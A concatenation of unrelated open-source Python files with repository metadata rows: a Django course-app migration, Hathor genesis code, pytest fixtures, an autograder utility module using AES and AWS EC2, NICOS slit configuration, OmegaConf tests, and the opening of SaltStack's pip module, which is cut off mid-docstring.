('image', models.ImageField(upload_to='course_images/')),
('description', models.CharField(max_length=1000)),
('pub_date', models.DateField(null=True)),
('total_enrollment', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Enrollment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_enrolled', models.DateField(default=django.utils.timezone.now)),
('mode', models.CharField(choices=[('audit', 'Audit'), ('honor', 'Honor'), ('BETA', 'BETA')], default='audit', max_length=5)),
('rating', models.FloatField(default=5.0)),
('course', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='onlinecourse.course')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Submission',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('choices', models.ManyToManyField(to='onlinecourse.Choice')),
('enrollment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='onlinecourse.enrollment')),
],
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question_text', models.TextField()),
('grade_point', models.FloatField(default=5.0)),
('course', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='onlinecourse.course')),
],
),
migrations.CreateModel(
name='Lesson',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(default='title', max_length=200)),
('order', models.IntegerField(default=0)),
('content', models.TextField()),
('course', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='onlinecourse.course')),
],
),
migrations.CreateModel(
name='Learner',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('occupation', models.CharField(choices=[('student', 'Student'), ('developer', 'Developer'), ('data_scientist', 'Data Scientist'), ('dba', 'Database Admin')], default='student', max_length=20)),
('social_link', models.URLField()),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Instructor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('full_time', models.BooleanField(default=True)),
('total_learners', models.IntegerField()),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='course',
name='instructors',
field=models.ManyToManyField(to='onlinecourse.Instructor'),
),
migrations.AddField(
model_name='course',
name='users',
field=models.ManyToManyField(through='onlinecourse.Enrollment', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='choice',
name='question',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='onlinecourse.question'),
),
]
| 46.926606 | 210 | 0.583187 |
851e4db9136a44b5000b9f70486fa0f6e1bc1bc8 | 2,464 | py | Python | hathor/transaction/genesis.py | mbnunes/hathor-core | e5e0d4a627341e2a37ee46db5c9354ddb7f8dfb8 | [
"Apache-2.0"
] | 51 | 2019-12-28T03:33:27.000Z | 2022-03-10T14:03:03.000Z | hathor/transaction/genesis.py | mbnunes/hathor-core | e5e0d4a627341e2a37ee46db5c9354ddb7f8dfb8 | [
"Apache-2.0"
] | 316 | 2019-09-10T09:20:05.000Z | 2022-03-31T20:18:56.000Z | hathor/transaction/genesis.py | jansegre/hathor-core | 22b3de6be2518e7a0797edbf0e4f6eb1cf28d6fd | [
"Apache-2.0"
] | 19 | 2020-01-04T00:13:18.000Z | 2022-02-08T21:18:46.000Z | # Copyright 2021 Hathor Labs
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING, List, Optional
from hathor.conf import HathorSettings
from hathor.transaction import BaseTransaction, Block, Transaction, TxOutput
if TYPE_CHECKING:
from hathor.transaction.storage import TransactionStorage # noqa: F401
settings = HathorSettings()
BLOCK_GENESIS = Block(
hash=settings.GENESIS_BLOCK_HASH,
nonce=settings.GENESIS_BLOCK_NONCE,
timestamp=settings.GENESIS_TIMESTAMP,
weight=settings.MIN_BLOCK_WEIGHT,
outputs=[
TxOutput(settings.GENESIS_TOKENS, settings.GENESIS_OUTPUT_SCRIPT),
],
)
TX_GENESIS1 = Transaction(
hash=settings.GENESIS_TX1_HASH,
nonce=settings.GENESIS_TX1_NONCE,
timestamp=settings.GENESIS_TIMESTAMP + 1,
weight=settings.MIN_TX_WEIGHT,
)
TX_GENESIS2 = Transaction(
hash=settings.GENESIS_TX2_HASH,
nonce=settings.GENESIS_TX2_NONCE,
timestamp=settings.GENESIS_TIMESTAMP + 2,
weight=settings.MIN_TX_WEIGHT,
)
GENESIS = [BLOCK_GENESIS, TX_GENESIS1, TX_GENESIS2]
GENESIS_HASHES = [settings.GENESIS_BLOCK_HASH, settings.GENESIS_TX1_HASH, settings.GENESIS_TX2_HASH]
def _get_genesis_hash() -> bytes:
import hashlib
h = hashlib.sha256()
for tx in GENESIS:
tx_hash = tx.hash
assert tx_hash is not None
h.update(tx_hash)
return h.digest()
GENESIS_HASH = _get_genesis_hash()
def _get_genesis_transactions_unsafe(tx_storage: Optional['TransactionStorage']) -> List[BaseTransaction]:
"""You shouldn't get genesis directly. Please, get it from your storage instead."""
genesis = []
for tx in GENESIS:
tx2 = tx.clone()
tx2.storage = tx_storage
genesis.append(tx2)
return genesis
def is_genesis(hash_bytes: bytes) -> bool:
"""Check whether hash is from a genesis transaction."""
for tx in GENESIS:
if hash_bytes == tx.hash:
return True
return False
| 29.686747 | 106 | 0.737013 |
9df791e491b8a3300aa5b5aed8ec37448d86d231 | 1,183 | py | Python | tests/conftest.py | rsokl/noggin | 154e4fffa3298eb1f65e1720712b21264733a7cd | [
"MIT"
] | 25 | 2019-05-28T13:59:43.000Z | 2021-08-20T00:08:10.000Z | tests/conftest.py | rsokl/noggin | 154e4fffa3298eb1f65e1720712b21264733a7cd | [
"MIT"
] | 23 | 2019-05-30T14:51:58.000Z | 2020-04-17T15:53:20.000Z | tests/conftest.py | rsokl/noggin | 154e4fffa3298eb1f65e1720712b21264733a7cd | [
"MIT"
] | 1 | 2020-04-17T15:54:52.000Z | 2020-04-17T15:54:52.000Z | import os
import tempfile
import matplotlib.pyplot as plt
import pytest
from hypothesis import Verbosity, settings
settings.register_profile("ci", deadline=None)
settings.register_profile("intense", deadline=None, max_examples=1000)
settings.register_profile("dev", max_examples=10)
settings.register_profile("debug", max_examples=10, verbosity=Verbosity.verbose)
settings.load_profile(os.getenv("HYPOTHESIS_PROFILE", "default"))
@pytest.fixture()
def cleandir() -> str:
""" This fixture will use the stdlib `tempfile` module to
move the current working directory to a tmp-dir for the
duration of the test.
Afterwards, the session returns to its previous working
directory, and the temporary directory and its contents
are removed.
Yields
------
str
The name of the temporary directory."""
with tempfile.TemporaryDirectory() as tmpdirname:
old_dir = os.getcwd()
os.chdir(tmpdirname)
yield tmpdirname
os.chdir(old_dir)
@pytest.fixture(scope="session", autouse=True)
def killplots():
"""Ensures all matplotlib figures are closed upon leaving the fixture"""
yield None
plt.close("all")
| 28.853659 | 80 | 0.726965 |
d55712f0c4c674bb0c34d5842cdb03b85422bc19 | 7,460 | py | Python | grading/utils.py | cc3-ug/lab03-2022 | a0bf2ae52185aa3070d9bcc5d1d349377371884f | [
"MIT"
] | null | null | null | grading/utils.py | cc3-ug/lab03-2022 | a0bf2ae52185aa3070d9bcc5d1d349377371884f | [
"MIT"
] | null | null | null | grading/utils.py | cc3-ug/lab03-2022 | a0bf2ae52185aa3070d9bcc5d1d349377371884f | [
"MIT"
] | null | null | null | import os
import re
import json
import boto3
import base64
import shutil
import hashlib
import zipfile
import paramiko
import tempfile
import pycparser
from os import environ
from glob import glob
from Crypto import Random
from subprocess import run
from subprocess import PIPE
from tabulate import tabulate
from Crypto.Cipher import AES
from distutils.dir_util import copy_tree
# encrypt a string
def encrypt(raw):
def pad(s):
return s + (16 - len(s) % 16) * chr(16 - len(s) % 16)
rawkey = environ['AUTOGRADERS_KEY']
key = hashlib.sha256(rawkey.encode()).digest()
raw = pad(raw)
iv = Random.new().read(AES.block_size)
cipher = AES.new(key, AES.MODE_CBC, iv)
return base64.b64encode(iv + cipher.encrypt(raw)).decode()
# decrypt an encrypted string
def decrypt(enc):
def unpad(s):
if (type(s[-1]) == int):
return s[0: -s[-1]]
return s[0: -ord(s[-1])]
enc = base64.b64decode(enc)
iv = enc[:16]
rawkey = environ['AUTOGRADERS_KEY']
key = hashlib.sha256(rawkey.encode()).digest()
cipher = AES.new(key, AES.MODE_CBC, iv)
return unpad(cipher.decrypt(enc[16:])).decode()
# reads a file
def read(filename):
f = open(filename, 'r')
text = f.read()
f.close()
return text.strip()
# writes json
def write_json(data, filename):
f = open(filename, 'w')
f.write(json.dumps(data))
f.close()
# reads a json
def read_json(filename):
f = open(filename, 'r')
text = f.read()
f.close()
return json.loads(text)
# parse a json string
def parse_json(text):
return json.loads(text)
# extracts a zip file to a directory:
def extract_to(file, to, delete=False):
zip_ref = zipfile.ZipFile(file, 'r')
zip_ref.extractall(to)
zip_ref.close()
if delete:
os.remove(file)
# join paths
def join(*args):
return os.path.join(*args)
# creates a temp directory
def tempdir(prefix='cc-3-temp', suffix=''):
return tempfile.mkdtemp(prefix=prefix, suffix=suffix)
# copy files from one dir to another
def copy_files(dirfrom, dirto):
if os.path.exists(dirfrom):
for f in glob(os.path.join(dirfrom, '*')):
if os.path.isdir(f):
copy_tree(f, os.path.join(dirto, os.path.basename(f)))
else:
shutil.copy2(f, dirto)
# copy file to a dir
def copy_file(filename, dirto):
if os.path.exists(filename):
shutil.copy2(filename, dirto)
# lists all files in dir
def ls(dir='.', files=[]):
for e in glob(os.path.join(dir, '*')):
if os.path.isdir(e):
ls(dir=e, files=files)
else:
files.append(e)
return files
# fix ownership
def fix_ownership():
# fix ownership
statinfo = os.stat(os.getcwd())
for f in ls():
if (os.geteuid() == 0):
os.chown(f, statinfo.st_uid, statinfo.st_gid)
for f in os.listdir(os.getcwd()):
if os.path.isdir(f):
os.chown(f, statinfo.st_uid, statinfo.st_gid)
# removes a directory
def delete_dir(dir):
shutil.rmtree(dir)
# removes a file
def delete_file(f):
os.remove(f)
# expected files
def expected_files(files, dir='.'):
dirfiles = ls(dir=dir)
not_found = []
for f in files:
if f not in dirfiles:
not_found.append(f)
return not_found
# executes a shell command
def execute(cmd=[], shell=False, dir='.', input=None, encoding='ascii', timeout=5):
return run(cmd, shell=shell, stdout=PIPE, stderr=PIPE, input=input, cwd=dir, timeout=timeout)
# makes a target
def make(target=''):
return execute(cmd=['make', target])
# parses a form
def parse_form(f):
f = open(f, 'r', encoding='latin1')
p = re.compile(r'^[0-9]+( )*:[a-zA-Z0-9, ]+$')
lookup = {}
for line in f:
line = line.strip()
if p.search(line) is not None:
vals = line.split(':')
lookup[vals[0].strip()] = vals[1].strip()
return lookup
# parses a c c99 file
def parse_c(filename):
print("here")
make(target=filename + '_conv.c')
f = open(filename + '_conv.c', 'r')
text = ''
p = re.compile(r'(\w)*#.*')
for line in f:
line = line.strip('\n')
if line == '':
continue
if p.search(line):
continue
text += line + '\n'
f.close()
parser = pycparser.c_parser.CParser()
print("about to parse: ", filename)
return parser.parse(text)
# parses a c c99 file
def parse_c_raw(filename):
f = open(filename + '.c', 'r')
text = ''
p = re.compile(r'(\w)*#.*')
for line in f:
line = line.strip()
if line == '':
continue
if p.search(line) and 'pragma' not in line.lower():
continue
text += line + '\n'
f.close()
f = open('temp.c', 'w')
f.write(text)
f.close()
task = execute(cmd=['gcc', '-E', 'temp.c'], timeout=30)
execute(cmd=['rm', 'temp.c'])
text = task.stdout.decode().strip()
parser = pycparser.c_parser.CParser()
return parser.parse(text)
# passed message
def passed(*args):
if len(args) > 0:
return 'passed: ' + args[0]
return 'passed'
# failed message
def failed(*args):
if len(args) > 0:
return 'failed: ' + args[0]
return 'failed'
# incomplete message
def incomplete(*args):
if len(args) > 0:
return 'incomplete: ' + args[0]
return 'incomplete'
# creates a compilation error msg
def create_error(filename, msg):
if msg != '':
return '[%s]\n\n%s\n' % (filename, msg)
return ''
# creates a pretty result report
def report(table):
return tabulate(table, headers=['Exercise', 'Grade', 'Message'])
# writes autograder result
def write_result(grade, msg):
write_json({'grade': grade, 'output': msg}, 'output.json')
# finds a specific function in the ast
def find_func(ast, name):
for f in ast.ext:
if type(f) == pycparser.c_ast.FuncDef and f.decl.name == name:
return f
return None
class AWSTask:
def __init__(self, name, instance='c5.2xlarge', AMI='ami-0e262d4de9c0b73fd', key='cc3'):
ec2 = boto3.resource('ec2')
self.instance = ec2.create_instances(
ImageId=AMI,
MaxCount=1,
MinCount=1,
InstanceType=instance,
SecurityGroupIds=['sg-00b6ec171be0d43f7'],
KeyName=key,
TagSpecifications=[
{
'ResourceType': 'instance',
'Tags': [
{
'Key': 'Name',
'Value': name
},
]
},
],
)[0]
self.instance.wait_until_running()
self.instance.reload()
self.instance.wait_until_running()
self.key = key
self.ipv4 = self.instance.public_ip_address
def connect(self):
key = paramiko.RSAKey.from_private_key_file(self.key + '.pem')
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(hostname=self.ipv4, username='ubuntu', pkey=key)
self.client = client
def run(self, cmd, timeout=30):
stdin, stdout, stderr = self.client.exec_command(cmd, timeout=timeout)
return (stdout.read().decode(), stderr.read().decode())
def terminate(self):
self.instance.terminate()
| 24.299674 | 97 | 0.587668 |
e09d6c9558303704e36c4b1d75e8a5e962464c47 | 3,835 | py | Python | test/setups/custom/sinq_amor_diaphragms.py | mlz-ictrl/nicos | a6de0bc194ba42e3dc04a033713b41b5499ba8e1 | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 12 | 2019-11-06T15:40:36.000Z | 2022-01-01T16:23:00.000Z | test/setups/custom/sinq_amor_diaphragms.py | ess-dmsc/nicos | 755d61d403ff7123f804c45fc80c7ff4d762993b | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 91 | 2020-08-18T09:20:26.000Z | 2022-02-01T11:07:14.000Z | test/setups/custom/sinq_amor_diaphragms.py | mlz-ictrl/nicos | a6de0bc194ba42e3dc04a033713b41b5499ba8e1 | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 6 | 2020-01-11T10:52:30.000Z | 2022-02-25T12:35:23.000Z | description = 'Various devices for diaphragms in AMOR'
devices = dict(
xs = device('test.utils.TestDevice',
description = 'xs motor',
precision = .1,
unit = 'mm',
abslimits = (-20, 20),
),
d1t = device('nicos.devices.generic.VirtualMotor',
description = 'Slit 1 top',
precision = .1,
unit = 'mm',
abslimits = (-20, 20),
),
d1b = device('nicos.devices.generic.VirtualMotor',
description = 'Slit 1 bottom',
precision = .1,
unit = 'mm',
abslimits = (-20, 20),
),
d1r = device('nicos.devices.generic.VirtualMotor',
description = 'Slit 1 right',
precision = .1,
unit = 'mm',
abslimits = (-20, 20),
),
d1l = device('nicos.devices.generic.VirtualMotor',
description = 'Slit 1 left',
precision = .1,
unit = 'mm',
abslimits = (-20, 20),
),
slit1 = device('nicos.devices.generic.slit.Slit',
description = 'Slit 1 with left, right, bottom and top motors',
opmode = '4blades',
left = 'd1l',
right = 'd1r',
top = 'd1t',
bottom = 'd1b',
),
d2t = device('nicos.devices.generic.VirtualMotor',
description = 'Slit 2 top',
precision = .1,
unit = 'mm',
abslimits = (-20, 20),
),
d2b = device('nicos.devices.generic.VirtualMotor',
description = 'Slit 2 bottom',
precision = .1,
unit = 'mm',
abslimits = (-20, 20),
),
d2r = device('nicos.devices.generic.VirtualMotor',
description = 'Slit 2 right',
precision = .1,
unit = 'mm',
abslimits = (-20, 20),
),
d2l = device('nicos.devices.generic.VirtualMotor',
description = 'Slit 2 left',
precision = .1,
unit = 'mm',
abslimits = (-20, 20),
),
d2z = device('nicos.devices.generic.VirtualMotor',
description = 'Slit 2 z',
precision = .1,
unit = 'mm',
abslimits = (-20, 20),
),
slit2 = device('nicos.devices.generic.slit.Slit',
description = 'Slit 2 with left, right, bottom and top motors',
opmode = '4blades',
left = 'd2l',
right = 'd2r',
top = 'd2t',
bottom = 'd2b',
),
controller_slm = device('nicos_sinq.amor.devices.slit.AmorSlitHandler',
description = 'Logical motors controller',
xs = 'xs',
slit1 = 'slit1',
slit2 = 'slit2',
lowlevel = True
),
div = device('nicos_sinq.amor.devices.slit.AmorSlitLogicalMotor',
description = 'Logical motor vertical divergence',
motortype = 'div',
controller = 'controller_slm',
unit = 'mm'
),
did = device('nicos_sinq.amor.devices.slit.AmorSlitLogicalMotor',
description = 'Logical motor ',
motortype = 'did',
controller = 'controller_slm',
unit = 'mm'
),
dih = device('nicos_sinq.amor.devices.slit.AmorSlitLogicalMotor',
description = 'Logical motor horizontal divergence',
motortype = 'dih',
controller = 'controller_slm',
unit = 'mm'
),
d2v = device('nicos_sinq.amor.devices.slit.AmorSlitLogicalMotor',
description = 'Logical motor vertical divergence',
motortype = 'd2v',
controller = 'controller_slm',
unit = 'mm'
),
d2d = device('nicos_sinq.amor.devices.slit.AmorSlitLogicalMotor',
description = 'Logical motor ',
motortype = 'd2d',
controller = 'controller_slm',
unit = 'mm'
),
d2h = device('nicos_sinq.amor.devices.slit.AmorSlitLogicalMotor',
description = 'Logical motor horizontal divergence',
motortype = 'd2h',
controller = 'controller_slm',
unit = 'mm'
),
)
| 30.927419 | 75 | 0.549413 |
eb3962289f4b9202c40d4c9c1bc0627ece26e3c0 | 11,634 | py | Python | tests/test_omegaconf.py | anthonytec2/omegaconf | 9a9c662a441ff828eadbfcd6fbf9e307439a93fd | [
"BSD-3-Clause"
] | null | null | null | tests/test_omegaconf.py | anthonytec2/omegaconf | 9a9c662a441ff828eadbfcd6fbf9e307439a93fd | [
"BSD-3-Clause"
] | null | null | null | tests/test_omegaconf.py | anthonytec2/omegaconf | 9a9c662a441ff828eadbfcd6fbf9e307439a93fd | [
"BSD-3-Clause"
] | null | null | null | from typing import Any
import pytest
from pytest import raises
from omegaconf import (
MISSING,
BooleanNode,
DictConfig,
EnumNode,
FloatNode,
IntegerNode,
ListConfig,
MissingMandatoryValue,
OmegaConf,
StringNode,
)
from omegaconf.errors import UnsupportedInterpolationType
from . import Color, ConcretePlugin, IllegalType, StructuredWithMissing, does_not_raise
@pytest.mark.parametrize( # type: ignore
"cfg, key, expected_is_missing, expectation",
[
({}, "foo", False, does_not_raise()),
({"foo": True}, "foo", False, does_not_raise()),
({"foo": MISSING}, "foo", True, raises(MissingMandatoryValue)),
(
{"foo": "${bar}", "bar": MISSING},
"foo",
True,
raises(MissingMandatoryValue),
),
(
{"foo": "${unknown_resolver:foo}"},
"foo",
False,
raises(UnsupportedInterpolationType),
),
({"foo": StringNode(value="???")}, "foo", True, raises(MissingMandatoryValue)),
(
{"foo": StringNode(value="???"), "inter": "${foo}"},
"inter",
True,
raises(MissingMandatoryValue),
),
(StructuredWithMissing, "num", True, raises(MissingMandatoryValue)),
(StructuredWithMissing, "opt_num", True, raises(MissingMandatoryValue)),
(StructuredWithMissing, "dict", True, raises(MissingMandatoryValue)),
(StructuredWithMissing, "opt_dict", True, raises(MissingMandatoryValue)),
(StructuredWithMissing, "list", True, raises(MissingMandatoryValue)),
(StructuredWithMissing, "opt_list", True, raises(MissingMandatoryValue)),
(StructuredWithMissing, "user", True, raises(MissingMandatoryValue)),
(StructuredWithMissing, "opt_user", True, raises(MissingMandatoryValue)),
(StructuredWithMissing, "inter_user", True, raises(MissingMandatoryValue)),
(StructuredWithMissing, "inter_opt_user", True, raises(MissingMandatoryValue)),
(StructuredWithMissing, "inter_num", True, raises(MissingMandatoryValue)),
],
)
def test_is_missing(
cfg: Any, key: str, expected_is_missing: bool, expectation: Any
) -> None:
cfg = OmegaConf.create(cfg)
with expectation:
cfg.get(key)
assert OmegaConf.is_missing(cfg, key) == expected_is_missing
OmegaConf.set_struct(cfg, True)
assert OmegaConf.is_missing(cfg, key) == expected_is_missing
OmegaConf.set_readonly(cfg, True)
assert OmegaConf.is_missing(cfg, key) == expected_is_missing
def test_is_missing_resets() -> None:
cfg = OmegaConf.structured(StructuredWithMissing)
assert OmegaConf.is_missing(cfg, "dict")
cfg.dict = {}
assert not OmegaConf.is_missing(cfg, "dict")
assert OmegaConf.is_missing(cfg, "list")
cfg.list = [1, 2, 3]
assert not OmegaConf.is_missing(cfg, "list")
cfg.list = "???"
assert OmegaConf.is_missing(cfg, "list")
@pytest.mark.parametrize( # type: ignore
"cfg, expected",
[
(None, False),
({}, False),
([], False),
("aa", False),
(10, False),
(True, False),
(bool, False),
(StringNode("foo"), False),
(ConcretePlugin, False),
(ConcretePlugin(), False),
(OmegaConf.create({}), True),
(OmegaConf.create([]), True),
(OmegaConf.structured(ConcretePlugin), True),
(OmegaConf.structured(ConcretePlugin()), True),
],
)
def test_is_config(cfg: Any, expected: bool) -> None:
assert OmegaConf.is_config(cfg) == expected
@pytest.mark.parametrize( # type: ignore
"cfg, expected",
[
(None, False),
({}, False),
([], False),
("aa", False),
(10, False),
(True, False),
(bool, False),
(StringNode("foo"), False),
(ConcretePlugin, False),
(ConcretePlugin(), False),
(OmegaConf.create({}), False),
(OmegaConf.create([]), True),
(OmegaConf.structured(ConcretePlugin), False),
(OmegaConf.structured(ConcretePlugin()), False),
],
)
def test_is_list(cfg: Any, expected: bool) -> None:
assert OmegaConf.is_list(cfg) == expected
@pytest.mark.parametrize( # type: ignore
"cfg, expected",
[
(None, False),
({}, False),
([], False),
("aa", False),
(10, False),
(True, False),
(bool, False),
(StringNode("foo"), False),
(ConcretePlugin, False),
(ConcretePlugin(), False),
(OmegaConf.create({}), True),
(OmegaConf.create([]), False),
(OmegaConf.structured(ConcretePlugin), True),
(OmegaConf.structured(ConcretePlugin()), True),
],
)
def test_is_dict(cfg: Any, expected: bool) -> None:
assert OmegaConf.is_dict(cfg) == expected
@pytest.mark.parametrize( # type: ignore
"is_optional", [True, False]
)
@pytest.mark.parametrize( # type: ignore
"fac",
[
(
lambda is_optional, missing: StringNode(
value="foo" if not missing else "???", is_optional=is_optional
)
),
(
lambda is_optional, missing: IntegerNode(
value=10 if not missing else "???", is_optional=is_optional
)
),
(
lambda is_optional, missing: FloatNode(
value=10 if not missing else "???", is_optional=is_optional
)
),
(
lambda is_optional, missing: BooleanNode(
value=True if not missing else "???", is_optional=is_optional
)
),
(
lambda is_optional, missing: EnumNode(
enum_type=Color,
value=Color.RED if not missing else "???",
is_optional=is_optional,
)
),
(
lambda is_optional, missing: ListConfig(
content=[1, 2, 3] if not missing else "???", is_optional=is_optional
)
),
(
lambda is_optional, missing: DictConfig(
content={"foo": "bar"} if not missing else "???",
is_optional=is_optional,
)
),
(
lambda is_optional, missing: DictConfig(
ref_type=ConcretePlugin,
content=ConcretePlugin() if not missing else "???",
is_optional=is_optional,
)
),
],
)
def test_is_optional(fac: Any, is_optional: bool) -> None:
obj = fac(is_optional, False)
assert OmegaConf.is_optional(obj) == is_optional
cfg = OmegaConf.create({"node": obj})
assert OmegaConf.is_optional(cfg, "node") == is_optional
obj = fac(is_optional, True)
assert OmegaConf.is_optional(obj) == is_optional
cfg = OmegaConf.create({"node": obj})
assert OmegaConf.is_optional(cfg, "node") == is_optional
@pytest.mark.parametrize( # type: ignore
"is_none", [True, False]
)
@pytest.mark.parametrize( # type: ignore
"fac",
[
(lambda none: StringNode(value="foo" if not none else None, is_optional=True)),
(lambda none: IntegerNode(value=10 if not none else None, is_optional=True)),
(lambda none: FloatNode(value=10 if not none else None, is_optional=True)),
(lambda none: BooleanNode(value=True if not none else None, is_optional=True)),
(
lambda none: EnumNode(
enum_type=Color,
value=Color.RED if not none else None,
is_optional=True,
)
),
(
lambda none: ListConfig(
content=[1, 2, 3] if not none else None, is_optional=True
)
),
(
lambda none: DictConfig(
content={"foo": "bar"} if not none else None, is_optional=True,
)
),
(
lambda none: DictConfig(
ref_type=ConcretePlugin,
content=ConcretePlugin() if not none else None,
is_optional=True,
)
),
],
)
def test_is_none(fac: Any, is_none: bool) -> None:
obj = fac(is_none)
assert OmegaConf.is_none(obj) == is_none
cfg = OmegaConf.create({"node": obj})
assert OmegaConf.is_none(cfg, "node") == is_none
@pytest.mark.parametrize(
"fac", # type: ignore
[
(
lambda inter: StringNode(
value="foo" if inter is None else inter, is_optional=True
)
),
(
lambda inter: IntegerNode(
value=10 if inter is None else inter, is_optional=True
)
),
(
lambda inter: FloatNode(
value=10 if inter is None else inter, is_optional=True
)
),
(
lambda inter: BooleanNode(
value=True if inter is None else inter, is_optional=True
)
),
(
lambda inter: EnumNode(
enum_type=Color,
value=Color.RED if inter is None else inter,
is_optional=True,
)
),
(
lambda inter: ListConfig(
content=[1, 2, 3] if inter is None else inter, is_optional=True
)
),
(
lambda inter: DictConfig(
content={"foo": "bar"} if inter is None else inter, is_optional=True,
)
),
(
lambda inter: DictConfig(
ref_type=ConcretePlugin,
content=ConcretePlugin() if inter is None else inter,
is_optional=True,
)
),
],
ids=[
"StringNode",
"IntegerNode",
"FloatNode",
"BooleanNode",
"EnumNode",
"ListConfig",
"DictConfig",
"ConcretePlugin",
],
)
def test_is_interpolation(fac):
obj = fac(inter=None)
assert not OmegaConf.is_interpolation(obj)
cfg = OmegaConf.create({"node": obj})
assert not OmegaConf.is_interpolation(cfg, "node")
assert not OmegaConf.is_interpolation(cfg, "missing")
for inter in ["${foo}", "http://${url}", "${resolver:value}"]:
obj = fac(inter=inter)
assert OmegaConf.is_interpolation(obj)
cfg = OmegaConf.create({"node": obj})
assert OmegaConf.is_interpolation(cfg, "node")
@pytest.mark.parametrize( # type: ignore
"cfg, type_",
[
({"foo": 10}, int),
({"foo": 10.0}, float),
({"foo": True}, bool),
({"foo": "bar"}, str),
({"foo": None}, type(None)),
({"foo": ConcretePlugin()}, ConcretePlugin),
({"foo": ConcretePlugin}, ConcretePlugin),
({"foo": {}}, dict),
({"foo": OmegaConf.create()}, dict),
({"foo": []}, list),
({"foo": OmegaConf.create([])}, list),
],
)
def test_get_type(cfg: Any, type_: Any) -> None:
cfg = OmegaConf.create(cfg)
assert OmegaConf.get_type(cfg, "foo") == type_
@pytest.mark.parametrize( # type: ignore
"obj, type_",
[
(10, int),
(10.0, float),
(True, bool),
("foo", str),
(DictConfig(content={}), dict),
(ListConfig(content=[]), list),
(IllegalType, IllegalType),
(IllegalType(), IllegalType),
],
)
def test_get_type_on_raw(obj: Any, type_: Any) -> None:
assert OmegaConf.get_type(obj) == type_
def test_is_issubclass() -> None:
cfg = OmegaConf.structured(ConcretePlugin)
t = OmegaConf.get_type(cfg)
assert t is not None and issubclass(t, ConcretePlugin)
| 30.296875 | 87 | 0.556558 |
2f453c0e71600727ca79d3263d5fd071961a01fc | 15,138 | py | Python | salt/modules/pip.py | abh/salt | e8870573a2d3eca1a7794ce8340797fa487de04d | [
"Apache-2.0"
] | 1 | 2017-09-09T11:21:13.000Z | 2017-09-09T11:21:13.000Z | salt/modules/pip.py | abh/salt | e8870573a2d3eca1a7794ce8340797fa487de04d | [
"Apache-2.0"
] | null | null | null | salt/modules/pip.py | abh/salt | e8870573a2d3eca1a7794ce8340797fa487de04d | [
"Apache-2.0"
] | null | null | null | '''
Install Python packages with pip to either the system or a virtualenv
'''
# Import Python libs
import os
import logging
import tempfile
import shutil
# Import Salt libs
from salt.exceptions import CommandExecutionError, CommandNotFoundError
# It would be cool if we could use __virtual__() in this module, though, since
# pip can be installed on a virtualenv anywhere on the filesystem, there's no
# definite way to tell if pip is installed on not.
logger = logging.getLogger(__name__)
def _get_pip_bin(bin_env):
'''
Return the pip command to call, either from a virtualenv, an argument
passed in, or from the global modules options
'''
if not bin_env:
which_result = __salt__['cmd.which_bin'](['pip2', 'pip', 'pip-python'])
if which_result is None:
raise CommandNotFoundError('Could not find a `pip` binary')
return which_result
# try to get pip bin from env
if os.path.isdir(bin_env):
pip_bin = os.path.join(bin_env, 'bin', 'pip')
if os.path.isfile(pip_bin):
return pip_bin
raise CommandNotFoundError('Could not find a `pip` binary')
return bin_env
def install(pkgs=None,
requirements=None,
env=None,
bin_env=None,
log=None,
proxy=None,
timeout=None,
editable=None,
find_links=None,
index_url=None,
extra_index_url=None,
no_index=False,
mirrors=None,
build=None,
target=None,
download=None,
download_cache=None,
source=None,
upgrade=False,
force_reinstall=False,
ignore_installed=False,
no_deps=False,
no_install=False,
no_download=False,
install_options=None,
runas=None,
cwd=None):
'''
Install packages with pip
Install packages individually or from a pip requirements file. Install
packages globally or to a virtualenv.
pkgs
comma separated list of packages to install
requirements
path to requirements
bin_env
path to pip bin or path to virtualenv. If doing a system install,
and want to use a specific pip bin (pip-2.7, pip-2.6, etc..) just
specify the pip bin you want.
If installing into a virtualenv, just use the path to the virtualenv
(/home/code/path/to/virtualenv/)
env
deprecated, use bin_env now
log
Log file where a complete (maximum verbosity) record will be kept
proxy
Specify a proxy in the form
user:passwd@proxy.server:port. Note that the
user:password@ is optional and required only if you
are behind an authenticated proxy. If you provide
user@proxy.server:port then you will be prompted for a
password.
timeout
Set the socket timeout (default 15 seconds)
editable
install something editable(ie git+https://github.com/worldcompany/djangoembed.git#egg=djangoembed)
find_links
URL to look for packages at
index_url
Base URL of Python Package Index
extra_index_url
Extra URLs of package indexes to use in addition to ``index_url``
no_index
Ignore package index
mirrors
Specific mirror URLs to query (automatically adds --use-mirrors)
build
Unpack packages into ``build`` dir
target
Install packages into ``target`` dir
